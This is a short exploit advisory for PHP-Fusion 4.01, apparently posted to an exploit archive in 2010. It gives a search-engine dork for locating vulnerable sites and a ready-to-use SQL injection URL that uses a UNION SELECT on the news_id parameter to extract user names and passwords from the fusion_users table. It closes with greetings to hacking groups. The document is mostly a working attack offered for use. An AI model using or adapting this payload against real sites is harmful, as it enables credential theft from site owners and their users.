PHP-Fusion 4.01 - SQL Injection

# Exploit Title: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities

# Date: 17/05/2010

# Author: Ma3sTr0-Dz

# Software Link: http://www.php-fusion.co.uk

# Version: 4.01

# CVE : N/A

# Code : [exploit code]

=======================================================PHP-Fusion v4.01 SQL INJECTION Vulnerabilities=======================================================############################################################## Name: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities .
# Vendor: www.php-fusion.co.uk# Date: 2010/05/17# Author: Ma3sTr0-Dz# Home : Www.Sec4ever.Com
# Contact: o5m@Hotmail.de#############################################################

# Part Expl0it & Bug Codes :

---
Dork : allinurl:readmore.php?news_id

http://site.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*

# Thanks to: Cmos_Clr -
 Hard_Hakerz- Sa4D - Mahmoud_SQL - RA3CH - His0k4 - Virus_Hacker_Dz - 
HCJ 



  g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !